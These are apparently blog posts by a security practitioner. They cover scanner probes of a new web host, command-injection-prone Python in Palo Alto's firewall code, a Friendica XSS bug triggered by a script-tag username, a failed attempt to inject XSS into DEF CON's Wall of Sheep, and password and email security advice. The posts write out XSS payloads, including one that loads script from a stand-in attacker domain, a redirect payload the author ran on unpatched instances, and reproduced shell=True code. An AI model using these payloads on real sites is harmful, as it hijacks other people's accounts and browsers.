infosec

    I am not exaggerating this:

    I created a new hostname in DNS, then added it to my existing webserver config.

    It was online for 3 seconds – 3! – before getting a 404 request for /.git/config.

    If you’re relying on obscurity to protect your services, get that right out your fool head today. You have about 3 seconds to get your act together.

    In the time it took me to type this, I got another 62 requests:

         30 "/"
          3 "/.git/config"
          2 "/.vscode/sftp.json"
          2 "/v2/_catalog"
          2 "/telescope/requests"
          2 "/server-status"
          2 "/server"
          2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
          2 "/?rest_route=/wp/v2/users/"
          2 "/login.action"
          2 "/.env"
          2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
          2 "/.DS_Store"
          2 "/debug/default/view?panel=config"
          2 "/config.json"
          2 "/_all_dbs"
          2 "/about"
    

    Conference tracks where more than a few people are wearing khaki:

    • Defending your AI assets
    • Defending your assets from AI
    • Defending your assets with AI

    Additional conference tracks where more than a few people have primary colored hair:

    • Prompt injection for lolz and cash

    Palo Alto's exploited Python code

    watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.

    The awfulness of Palo Alto’s Python code in this snippet stood out to me:

    def some_function():
        ...
        if source_ip_str is not None and source_ip_str != "": 
            curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
                         %(signedUrl, fname, capath, source_ip_str)
        else:
            curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
                         %(signedUrl, fname, capath)
        if dbg:
            logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
        stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
        ...
    
    def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
        """call shell-command and either return its output or kill it
           if it doesn't normally exit within timeout seconds"""
    
        # Define dosys specific constants here
        PANSYS_POST_SIGKILL_RETRY_COUNT = 5
    
        # how long to pause between poll-readline-readline cycles
        PANSYS_DOSYS_PAUSE = 0.1
    
        # Use first_wait if time to complete is lengthy and can be estimated 
        if first_wait == None:
            first_wait = PANSYS_DOSYS_PAUSE
    
        # restrict the maximum possible dosys timeout
        PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
        # Can support upto 2GB per stream
        out = StringIO()
        err = StringIO()
    
        try:
            if shell:
                cmd = command
            else:
                cmd = command.split()
        except AttributeError: cmd = command
    
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                 stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
        timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
    

    It uses string building to create a curl command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True). What? No! Don’t ever do that!

    I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:

    ᐅ bandit pan.py
    [main]  INFO    profile include tests: None
    [main]  INFO    profile exclude tests: None
    [main]  INFO    cli include tests: None
    [main]  INFO    cli exclude tests: None
    [main]  INFO    running on Python 3.12.1
    Run started:2024-04-16 17:14:52.240258
    
    Test results:
    >> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
       Severity: Medium   Confidence: Low
       CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
       More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
       Location: ./pan.py:14:26
    13              logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
    14          stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
    15
    
    --------------------------------------------------
    >> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
       Severity: High   Confidence: High
       CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
       More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
       Location: ./pan.py:49:8
    48              bufsize=1,
    49              shell=shell,
    50              stderr=subprocess.PIPE,
    51              close_fds=close_fds,
    52              universal_newlines=True,
    53          )
    54          timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
    
    --------------------------------------------------
    
    Code scanned:
            Total lines of code: 41
            Total lines skipped (#nosec): 0
    
    Run metrics:
            Total issues (by severity):
                    Undefined: 0
                    Low: 0
                    Medium: 1
                    High: 1
            Total issues (by confidence):
                    Undefined: 0
                    Low: 1
                    Medium: 0
                    High: 1
    Files skipped (0):
    

    From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.

    Veilid in The Washington Post

    I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:

    Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.

    You bet I’m letting this go to my head.

    At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”

    At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.

    But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.

    I use Things without encryption

    Update 2023-11-03: No, I don’t.


    I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:

    • Lacks end-to-end encryption

    I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

    I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.

    I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)

    Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.

    Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.

    While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.

    Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.

    But I know I should still look for something more secure.

    Accidentally Hacking the Planet

    Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

    <script type="text/javascript">alert("I was here.");</script>
    

    Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

    <script>alert("Tek");</script>
    

    Then I laughed about it with my geeky friends and promptly forgot all about the joke.

    And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

    • An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
    • The attack was simple: I changed my username to a bit of valid JavaScript.
    • All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
    • My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
    <script src="https://hackerz.ru/badstuff.js">Hi</script>
    
    • The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.

    That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.

    The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2

    My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

    <script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
    

    It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

    I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

    To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

    It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.


    1. Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎

    2. Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎

    The Internet is a rough neighborhood

    This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

    A screenshot of blocked inbound connection attempts, originating from all over the world.

    Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.

    “I run my service on a custom port!” Doesn’t matter.

    “I use IPv6!” Doesn’t matter.

    “I’m just a nobody!” Doesn’t matter.

    Practice safer networking, every time, all the time.

    Trying (and Failing) to hack the Wall of Sheep

    The Wall of Sheep is a popular exhibit at DEF CON. Participants run packet sniffers on an insecure Wi-Fi network and try to catch people logging into unencrypted websites and other services. If they see that happening, they post the person’s username and password on a giant display. It looks something like:

    Sample Wall of Sheep

    That’s an excellent reminder to be careful when you’re connected to an unknown network, and not to send your login credentials out in the open.

    From the first time I saw it, though, I had to wonder: is the wall itself hackable? Could I make it look like this instead?

    Snoop onto them, as they snoop onto us.

    The idea kept bouncing around the back of my mind until I added it to my to-do list so I could stop thinking about it. I had to at least try it.

    To do: hack the wall!

    Assumptions

    I know nothing about the Wall of Sheep’s internal workings. That’s deliberate. I wanted to test this for the fun of it, and part of the challenge was to see how far I could get without any knowledge of it. I had to make a few assumptions:

    1. If you’re connected to the right Wi-Fi network and submit credentials in plaintext, they’ll be shown on the wall.
    2. The process of getting captured credentials on the wall is automated.
    3. The wall is rendered by a web browser.
    4. The wall’s software has been around for a while and wasn’t written to be particularly secure. After all, it’s on the attacking end, right?
    5. No one’s tried this before, so no one’s fixed it before.

    Choosing the attack

    If the above assumptions are true, the obvious attack vector is Cross Site Scripting (XSS). The method is to create a snippet of JavaScript and then trick the Wall of Sheep into displaying — and executing — it. This should work:

    <script type="text/javascript">alert("I was here.");</script>
    

    But how do I get that onto the board? The password field is usually censored, such as hunter2 being masked to hunt***. That would destroy the payload, so that wouldn’t work. Is there a way to make a DNS hostname that renders correctly? Eh, maybe, but crafting that sounds like work. (Note to self: but boy, wouldn’t that wreak havoc on the web? Huh. I’ve gotta look into that.)

    However, look at that lovely login field. It’s just sitting out there in full, uncensored, plaintext glory. Jackpot! That’s where I’ll inject the JavaScript.

    Setting up a webserver

    This attack requires a webserver to send those faked credentials to. For ease of implementation, I configured HTTP Basic authentication with:

    • Username: Me<script ...
    • Password: lol
    Remember how I've wanted to do this for years? Guess who suddenly remembered to do it on the last day of DEF CON. Everything after this was done on my iPhone with Vim in an SSH client. This was not an ideal way to do something technical. Learn from my mistakes: failing to plan is planning to fail.

    Getting onto the DefCon-open Wi-Fi

    You brought a burner device, right? I didn’t. What could possibly go wrong connecting an off-the-shelf device to an open network at DEF CON! YOLO.

    Visiting the web page

    I logged into the page on my webserver’s bare IP address, watched the board, and… nothing. I reloaded it; nothing. I looked around to see if any of the participants looked like they might’ve found something; still nothing. Rats.

    Enlisting help

    Jan and Pat1 were participants sitting near where I was setting this up. I needed their assistance but didn’t want to outright ask for it. I started posing innocent questions to Jan: “Hey, what are you working on? What’s Wireshark?” While they kindly explained in general terms, they were understandably more interested in their own project than tutoring a passerby. Pat was more willing to teach me and I pulled up a chair to sit with them. They patiently answered my questions and pointed to interesting things on their screen. They also noticed fairly quickly that I was regularly reloading a page on my phone as I watched them. “Hey, uh, are you trying to get caught?” “Maaaaybe…” “Why?” I gave them a quick explanation of my project and they instantly bought in:

    Pat: Do you think this’ll work?
    Me: Probably not, but it’s worth a shot.
    Pat: Oh, wow. If it does, this will be legendary!

    I had a helper. Soon after, Jan noticed we were up to something, leading to one of my favorite exchanges at DEF CON:

    Jan: Are you two trying to get something up there on the board?
    Me, grinning: Yeah. It’s a JavaScript injection.
    Jan, wide-eyed: Who the hell are you?

    Thank you, Jan. I felt like a bona fide Security Researcher after that.

    Another random visitor saw us huddled and asked if we were trying to hack something. Jan looked at me, looked at the visitor, said “nope”, and looked back at me. I winked at Jan. Jan nodded back. The visitor squinted at us and walked off. Jan had my back.

    Pat and Jan were awesome. When we couldn't capture my phone's request, Pat asked if I happened to be on a VPN. facepalm. Yes, I had iCloud Private Relay turned on globally.

    Social engineering a Shepherd

    After experimentation, we had usable Wireshark captures of me logging into my website. However, they weren’t being displayed on the Wall of Sheep. It turned out that my assumption was wrong: we had to demonstrate the capture to a “Shepherd” running the contest. Pat called one over. We showed them Pat’s capture, but they weren’t convinced at first. Most website logins are through a form POSTed to the server, not through HTTP Basic authentication. The Shepherd was also skeptical that the login was successful because the server was returning the default “welcome to Nginx!” page and not something personalized for the (obviously fake) username. I leaned very hard into the “innocent observer” role, asking questions like “but isn’t that what a successful capture looks like?” and “golly gee, it looks right to me. Don’t you think?” and “it looks suspicious to me, too, but couldn’t we try it and see what happens?” Our Shepherd seemed almost ready to go along with it — until they burned my plan to the ground.

    Defeat

    I asked the Shepherd how a login goes from being captured to being shown on the Wall of Sheep. Their reply doomed our fun: “I’d type it in.” Oh no. That’s not good. “Isn’t it automatic?”, I asked. The Shepherd paused to rub the bridge of their nose. “Well,” they sighed, “it was until people started sending a bunch of vile usernames and passwords and kind of ruined it2, so now we have to moderate the process.” I wasn’t giving up, though. “Could you type that username to see what happens?” “It’d just show up like that,” they replied. “Could we try it?”, I pleaded. “I mean, it’s just text. Um, that’s not a web page”, they countered.

    What.

    And then for the first time ever, I saw a flashing cursor down in the bottom corner of the Wall of Sheep. My heart sunk. “Is that Excel or something?” They grinned: “it’s just some old software we run.”

    Disaster.

    Regrouping

    That’s when I formally gave up on this attempt. If it were ever possible to hack the Wall of Sheep, it wasn’t on that day. That doesn’t mean I’m abandoning this forever, though. Next year, I’m going to make a smarter effort, by:

    • Setting this up in advance. Again, Vim over SSH on a phone sucks. I’ll have the fake login working before I leave home.
    • Getting there earlier. If the Wall of Sheep is ever going to be automated and rendered in a browser, it’ll be at the opening of DEF CON before anyone’s polluted the waters.
    • Using a more common authentication method than HTTP Basic auth, like a typical login form.
    • Making the resulting page look like I’d really logged into a legitimate service.
    • Bringing a burner device, because putting my own personal device on that specific Wi-Fi network was not the best idea I’ve ever had.

    And if Jan and Pat are around, I’m recruiting their help again.

    To do: hack the wall harder!

    1. I didn’t get anyone’s names, or their permission to describe them. Fake names are all you get. ↩︎

    2. I appreciate the irony that I’m complaining about hackers getting stuff to show up on the Wall of Sheep in a post where I’m talking about getting stuff to show up on the Wall of Sheep. The first rule of a good prank, though, is “don’t be a jackass and ruin it for everyone else”. I was going for something that I hoped the Shepherds would find amusing and wasn’t trying to get racial slurs and other vile junk to show up on a big screen. Don’t be that person. ↩︎

    Slack was broadcasting hashed passwords for 5 years

    I received an email from Slack on Thursday, 2022-08-04:

    We’re writing to let you know about a bug we recently discovered and fixed in Slack’s Shared Invite Link functionality. This feature allows users with the proper permissions to create a link that will allow anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because one or more members of your workspace created and/or revoked one of these links for your workspace between April 17th, 2017 and July 17th, 2022. We’ll go into detail about this security issue below.

    Important things first, though: We have no reason to believe that anyone was able to obtain plaintext passwords for users in your workspace because of this vulnerability. However, for the sake of caution, we have reset impacted users’ Slack passwords. They will need to set a new Slack password before they can login again. A list of impacted users is below.

    [redacted]

    Now, for some technical details — feel free to skip the next two paragraphs if that doesn’t interest you. When you’re connected to Slack, we keep your client updated using a piece of technology called a websocket. This is an always-open stream of behind-the-scenes information, specific to just you and your account, that we use to push new information to your Slack client. When a new message is posted, a new file is uploaded, a new emoji reaction is added, or a new teammate joins, all of this information (plus much more!) is sent to you over a websocket. Data streamed from Slack’s servers over the websocket is processed by the Slack client apps, but often hidden from the user’s view.

    One of the hidden events we send over the websocket is a notice that a shared invite link was created or revoked. The bug we discovered was in this invite link event: along with the information about the shared invite link, we included the hashed password of the user who created or revoked the link. This information was sent over the websocket to all users of the workspace who were currently connected to Slack. The hash of a password is not the same as the password itself; it is a cryptographic technique to store data in a way that is secure, but not reversible. In other words, it is practically infeasible for your password to be derived from the hash, and no one can use the hash to log in as you. We use a technique called salting to further protect these hashes. Hashed passwords are secure, but not perfect — they are still subject to being reversed via brute force — which is why we’ve chosen to reset the passwords of everyone affected.

    When your users reset their passwords we recommend selecting a complex and unique password. This is easiest to do by using a password manager to help generate and store strong, unique passwords for every service.

    If you have additional questions, or if you need our help as you investigate this issue, you can reply to this message or email us feedback@slack.com.

    We know that the security of your data is important. We deeply regret this issue and its impact on your organization.

    Sincerely, The team at Slack

    In summary, for 5 years Slack sent your hashed password to everyone on your Slack server every time you invited (or uninvited) someone to it.

    This email leaves a few questions unanswered:

    • How can you have a major vulnerability like this for 5 years?
    • What hashing algorithm did they use? Argon2? MD5?
    • Did they use per-user salts or one global one?
    • Where is the open, public notification of the issue?

    However, they did get one thing right: use a password manager to generate a strong, random password for every single service you use, and never, ever, under any circumstances, use the same password for more than one service. Because if you’ve invited anyone to Slack in the last 5 years, and you use the same password for Slack and your bank, I hope you’re on friendly terms with all of your coworkers.

    Update 2022-08-06

    Slack has now posted about this on their blog.

    Do not use Readdle's Spark email app

    I’ve written before about Readdle’s Spark email client, which is popular, highly rated, and a beautifully powerful app. It’s also too dangerous to use. I recommend dropping it immediately.

    Readdle is a good, reputable company. I respect and appreciate them. However, Spark’s design is fatally flawed: to use its advanced features, your email username and password (or token — same thing) have to be stored on their servers so that they can access your email account on your behalf. That’s bad under normal circumstances, but astoundingly risky today. Readdle was founded in Ukraine and still has many Ukrainian employees. Russia is currently invading Ukraine, a sovereign country. If Russia manages to do this, they could likely have access to the login credentials of every one of Spark’s users. This would be catastrophic. Imagine Russia’s security agencies having full access to your work account, being able to use your personal email to reset your banking website’s password, or reading every email you’ve ever sent or received.

    Spark isn’t the only email app designed this way. I believe it’s the most popular, though, and that means its dangerous-by-design architecture is used by a lot of people. This isn’t acceptable and it can’t be fixed. If you use Spark, I strongly recommend following their instructions to delete all your data off their servers immediately, and then changing the password of every account you’d used it with.

    And when you’re done, see if their other apps look interesting to you. Risks with Spark aside, Readdle makes delightful software and could use our support right now.

    Uniquely bad identity branding

    My company has an account with a certain identity provider so we can test that our single sign-on feature works. Today one of my coworkers asked for an account with the IdP before he started working on that part of our code. I tried to create his user but got an error that the “username must be unique”. Huh. I double-checked our user list to ensure we didn’t have an account for him. We didn’t. I tried again and got the same error. That’s when I reached out to their support. They quickly replied:

    To resolve this issue, please navigate to Administration > Settings > Branding and toggle the custom branding switch to green. Then try to create a user and it should allow you!

    What. This had nothing to do with branding, and the switch in question looks like this:

    "Custom branding" checkbox

    But alright, I figured I’d try their suggestion.

    It worked.

    I supposed what likely happened was that support quickly found and fixed and issue, then gave me a switch to flip to make it feel like I was fixing something. I replied to them:

    So we couldn’t add that user (but could add other users) because we didn’t have custom branding enabled? That can’t be right.

    Their response?

    It could be possible that the same username could exist in another customer’s tenant. So, once you enable the custom branding it would only look for your tenant for a unique username. With branding currently being disabled, the system is considering all tenants.

    In short, if you click a logo to use your own theme for their site, usernames only have to be unique within your organization. If you don’t customize the site’s theme, they have to be unique across the whole identity provider. Furthermore, that uniqueness check only happens when you create a new user. If you flip the branding/namespace switch on, create an account, then flip the switch back off, the account is still active and usable even though it’s not globally unique. Even if you think that tying branding to uniqueness is a good idea — and it’s not — it doesn’t even work.

    That whole setup is nuts.

    Tripping on a Cracked Sidewalk

    Amazon Sidewalk is a new project which allows Amazon devices (like Alexa, Ring doorbells, etc.) with different owners to share their Internet connections. In short, your Alexa talks to your neighbor’s Alexa. If your Internet connection goes down, your neighbor’s device will relay messages for your device so that it can keep working. Similarly, if your Ring doorbell is closer to your neighbor’s Alexa than to your own WiFi router, it can send alerts to you through their Alexa.

    This is a terrible idea.

    This means that a device on your home network — a device you bought and paid for yourself — is letting other devices you don’t control borrow your Internet connection. Amazon claims to have designed this as a secure system, but people in infosec know that a new security protocol written and implemented by a single company is going to be a mess. When (not if, but when) an attacker finds a flaw in the Sidewalk protocol or the devices it runs on, 2 terrible scenarios seem likely to happen:

    • However good and strong your WiFi password is, if an attacker can access your neighbor’s network, they can hack your neighbor’s Alexa and then use it to gain access to your own wireless network.
    • A braver attacker could sit outside your house with a hacked Alexa, or an app on their laptop that acts like one, and use it to connect to your Ring doorbell and then attack the other computers on your network.

    If you have any Amazon devices, I strongly recommend you follow their instructions to turn off Sidewalk immediately. Because Amazon plans to turn this on for everyone who hasn’t explicitly asked them not to, if you don’t follow those instructions, you’ll be allowing people near your home to use your WiFi. Some owners have claimed that they turned off Sidewalk but that it turned itself back on after a software update. If this happens in my home, I will literally throw our Alexas out in the trash.

    Amazon Sidewalk is a solution without a problem. Turn it off. This is a potential disaster in the making.

    Security training for the masses

    My company is going through its annual HIPAA privacy and security refresher training. This is a good thing and I wholeheartedly support it, as it’s always nice to be reminded of some of the details. “Oh, I forgot that we’re allowed to do X! That’s good to know.”

    But the most irksome thing in the world is when you know the right answer to a test question but are required to give the wrong one to pass it. For instance, we were asked:

    If you then connect with a VPN, will that ensure a file sent via email will be secure all the way through to its destination? Yes / No / Maybe

    Test says: maybe! If you change nothing about your setup except adding a VPN into the mix, you may now be able to send email securely.

    I say: The correct answer is “of course not”. Our company uses a “split tunnel” VPN so that only connections to certain services go over the VPN but the rest of our traffic goes over the open Internet? Do we need to route someone’s after-hours Netflix viewing through an encrypted connection? No thank you. But even without that, once you send an email to your own server, you have no control over what happens next. Does the recipient’s server support TLS connections? Are emails stored on that server encrypted at rest? Does their email app require TLS? Who knows! You sure won’t. So no, a VPN absolutely does not guarantee an email will be secure all the way through to its destination.

    If you encrypt the file you are emailing, will that ensure a file sent via email will be secure all the way through to its destination?

    Test says: yes! If you encrypt an email to an employee at another company, it’s guaranteed to be secure.

    I say: Maybe, sure. I’d even go so far as saying it probably will. However, for all I know the recipient’s company uses some key escrow thing that lets them decrypt and analyze all inbound mail, and Joe from IT occasionally sells the interesting ones to North Korea.

    Thing is, our particular training program is for the most part pretty decent, as far as such things go. Again, I’m glad we’re doing it. I just wish their post-training exams were a little more carefully worded.

    A standard for describing a site's password rules

    There’s not a universal standard for what a valid password on a website must look like. Some sites allow you to use any four letters. Others require at least twenty characters, including at least one numeric digit and one “special character” (aka punctuation). Even when using a password manager, the process of creating a good one looks a lot like:

    • Turn the password manager’s strength settings all the way up and generate a password.
    • The website replies “passwords can’t be more than 20 characters long”.
    • Adjust the length down to twenty. Generate a new one and send it to the website.
    • The website replies “passwords may only contain the special characters ‘$_!#’.
    • Adjust the number of symbols down to zero. Generate. Try again.
    • The website replies “passwords must contain at least two special characters”.
    • Turn the number of symbols back up to two. Click “generate” until you a password that contains punctuation from “$”, “_”, “!”, and “#”, but nothing else. Generate. Try again.
    • …and repeat until you’ve appeased the website’s rules.

    I propose instead that websites should document their password rules in a standardized, machine-readable manner. For instance, suppose that each site hosted a file in a pre-defined location, like /.well-known/password-rules.yaml, in a format such as:

    max_length: 64
    min_length: 8
    allowed_symbols: "$#@!"
    min_symbols: 1
    min_upper: 1
    min_lower: 1
    min_digits: 1
    matches: "^[a-z]+(.*)+$"
    

    Then tools like 1Password could look for that file and tune their settings to suit. The new process for creating a password would look like:

    • Tell 1Password to generate a password for the site you’re currently looking at.
    • It fetches the rules file, interprets it, creates a password that satisfies all the requirements, and pastes it in the password field on the site.

    Further suppose that the standard defined the calling conventions of a REST endpoint for changing passwords, and the rules file included that URL like:

    change_url: /ajax/change_my_password
    

    Wouldn’t it be just lovely if 1Password could automatically update every such website on a monthly basis, or whenever a site announces a security breach?

    Purge your Yahoo account (but don't delete it!)

    There are about 1.5 billion reasons to want to cancel your Yahoo account. Don’t do that!

    According to Yahoo’s account deletion page, they “may allow other users to sign up for and use your current Yahoo! ID and profile names after your account has been deleted”:

    Yahoo! account reuse

    This is a terrible policy not shared by other service providers, and there are many scenarios where it’s a huge security problem for Yahoo’s users. For example:

    • You register for Facebook with your me@yahoo.com email address.
    • You forget about that, read about the newest Yahoo user database hack, and delete your Yahoo account.
    • A month later, someone else signs up to get your me@yahoo.com email address. They use Facebook’s password reset mechanism to take control of your account, download your private photos, and say nasty things to your friends.
    • Oh, and anyone you forgot to share your new address with is still sending personal communications to your old Yahoo address, and its new owner is reading them.

    Here’s what you should do instead:

    Purge your Yahoo account

    It’s time to move on. Yahoo has a terrible security track record and shows no signs of improving.

    First, understand what you’ll be doing here. You’ll be removing everything from your Yahoo account: your email, contacts, events, and so on. Permanently. There’s no changing your mind. It’s extreme, sure, but until you do it’s likely that hackers can:

    • Read messages from your spouse or partner.
    • See your calendar events to know when you’ll be away from the house.
    • Take over your account and start resetting every password associated with it, like Facebook, Amazon, and your bank.

    Don’t delete your account. Clean it out!

    Secure it

    Before doing anything else, change your Yahoo password! Hackers probably have your current one. I’m not exaggerating.

    Once that’s done, turn on two-factor authentication (2FA). This can prevent hackers from accessing your account even if they get your password.

    Once that’s done, make a note to yourself to turn on 2FA for every other account you have that supports it.

    Make your new home

    Before you start, you’ll want to create an email account with a new provider. Lots of people like Gmail but pick one that looks good to you. This will be your new home account on the Internet: the email address that you give out to friends and coworkers and that you use to log into websites.

    Clear your email

    • Log into your Yahoo mail.
    • Click the little checkbox above your emails to select all of them.
    • Click the Delete button to delete all email on that page. If you have lots of messages, you may have to repeat this several times.
    • Hover over the Trash mailbox to make the trashcan icon appear. Click the trashcan.
    Trash icon
    • Confirm that you want to empty your trash.
    Confirm emptying trash

    Clear everything else

    If you’re like most people, that’s probably 99% of your Yahoo data. You’re not quite done yet, though! Now click through each of the services in the little icons in the top left corner:

    Other services to clear

    They all may have more information stored in them. Each works a little differently but you should be able to figure out how to clean out each one.

    Set a vacation reminder

    Other email providers make it easy to forward all of your incoming mail to a new account. Yahoo removed that feature recently so you can’t use that convenient approach. Instead, you’ll make a Vacation Response to tell people about your new address.

    • Click the settings gear in the top right corner.
    • Choose Settings, then Vacation Response.
    • Check the box to “Enable automatic response”, and set the Until: year to as far in the future as it will let you.
    Example vacation reminder
    • Enter a message like:

    I may now be reached at me@example.com. Please update your address book. Thanks!

    • Click Save.

    Now anyone writing to you will get a message with your new address, but their email will still land in your Yahoo inbox.

    Change your logins

    Now go through your web accounts and change all of them where you log in with me@yahoo.com to use your new email address instead. If you use a password manager to keep track of your accounts, this will be easy. Time consuming — thanks, Yahoo! — but easy.

    Check back

    You’re going to miss a few accounts, and some friends or family will stubbornly insist on sending email to your old address. Set a reminder or mark your calendar to check your Yahoo mail a month from now to see who’s written to you. Update each of those people or accounts, then delete all of your new messages. Check again in another month and then another after that. Eventually this will slow to a trickle and you can forget about your old Yahoo account for many months at a time (or until the next news article about a giant Yahoo hack comes along, and then you can smile to yourself because it doesn’t affect you anymore).

    Conclusion

    Migrating off Yahoo is a pain in the neck. Google, in contrast, makes it easy to extract all your information and then securely close your account. Yahoo does not. It won’t be quick or painless, but I recommend that you start now.

    On Generated Versus Random Passwords

    I was reading a story about a hacked password database and saw this comment where the poster wanted to make a little program to generate non-random passwords for every site he visits:

    I was thinking of something simpler such as “echo MyPassword69! slashdot.org|md5sum” and then “aaa53a64cbb02f01d79e6aa05f0027ba” using that as my password since many sites will take 32-character long passwords or they will truncate for you. More generalized than PasswordMaker and easier to access but no alpha-num+symbol translation and only (32) 0-9af characters but that should be random enough, or you can do sha1sum instead for a little longer hash string.

    I posted a reply but I wanted to repeat it here for the sake of my friends who don’t read Slashdot. If you’ve ever cooked up your own scheme for coming up with passwords or if you’ve used the PasswordMaker system (or ones like it), you need to read this:

    DO NOT DO THIS. I don’t mean this disrespectfully, but you don’t know what you’re doing. That’s OK! People not named Bruce generally suck at secure algorithms. Crypto is hard and has unexpected implications until you’re much more knowledgeable on the subject than you (or I) currently are. For example, suppose that hypothetical site helpfully truncates your password to 8 chars. By storing only 8 hex digits, you’ve reduced your password’s keyspace to just 32 bits. If you used an algorithm with base64 encoding instead, you’d get the same complexity in only 5.3 chars.

